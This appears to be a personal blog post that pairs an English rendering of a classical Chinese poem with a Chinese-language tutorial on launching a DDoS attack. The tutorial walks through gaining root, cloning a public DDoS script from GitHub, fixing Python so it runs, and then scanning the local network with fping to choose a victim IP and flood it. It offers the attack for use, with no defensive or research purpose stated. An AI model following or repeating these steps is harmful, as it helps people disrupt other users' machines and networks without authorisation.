banner
andrewji8

Being towards death

Heed not to the tree-rustling and leaf-lashing rain, Why not stroll along, whistle and sing under its rein. Lighter and better suited than horses are straw sandals and a bamboo staff, Who's afraid? A palm-leaf plaited cape provides enough to misty weather in life sustain. A thorny spring breeze sobers up the spirit, I feel a slight chill, The setting sun over the mountain offers greetings still. Looking back over the bleak passage survived, The return in time Shall not be affected by windswept rain or shine.
telegram
twitter
github

如何進行DDoS攻擊的步驟如下:

  1. sudo -i 獲取 root 權限

sudo -i

  1. 輸入

cd DDos-Attack

進入 DDos 目錄

有的人在這裡可能會遇到無法進入的問題

首先我們檢查文字大小寫有沒有問題

如果無誤那應該是沒有配置好文件

只需輸入

git clone https://github.com/Ha3MrX/DDos-Attack

即可 clone,一般能解決掉問題

當然問題有問多種,我在進行實操的時候它卻提示無法克隆

我在網上找了許多解決方法,最終成功的是將 “https” 更換為 “git”,也就是說

git clone git://github.com/Ha3MrX/DDos-Attack

這樣便可以完成配置。

  1. 繼續輸入 chmod +x ddos-attack.py 設置權限

chmod +x ddos-attack.py

這條命令輸入後並沒有提示,所以大家確保輸入正確就可以了

  1. python ddos-attack.py 進入攻擊界面

python ddos-attack.py

這裡也有可能出現問題,如未找到 python 命令的提示(原提示句是什麼我忘了,但就這個意思)

這就是 python 沒有設置好的緣故 可能是因為你的 python 版本裝太多了給終端整蒙了

這個時候先用 which python 查看 python

which python

不出意外應該會顯示:/usr/bin/which : no python in (/usr/lib64/bin:/usr/lib64/sbin:/usr/lib/bin)

但不要急,這不是沒有 python。我們直接按版本查找輸入 which python2

which python2

會顯示這樣的文字,我們觀察發現 python2.7 才是可識別的

/usr/bin/python2

$ ls -l /usr/bin/python2

-rwxr-xr-x. 1 root root /usr/bin/python2.7

所以我們只需要輸入

$ ln -s /usr/bin/python2.7 /usr/bin/python

即可解決問題!

這個時候會出現這樣的界面

Screenshot_3

就是進入成功了

在 IP 那欄輸入目標 IP 即可進入攻擊

但是我們要獲取局域網內對方的 IP 需要輸入

ifconfig

先確認自己的 IP 然後利用”fping -g 本機 IP 地址 / 24“來查看局域網內所有 IP

fping -g 本機 IP 地址 / 24

然後選擇你的目標進行攻擊即可。

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。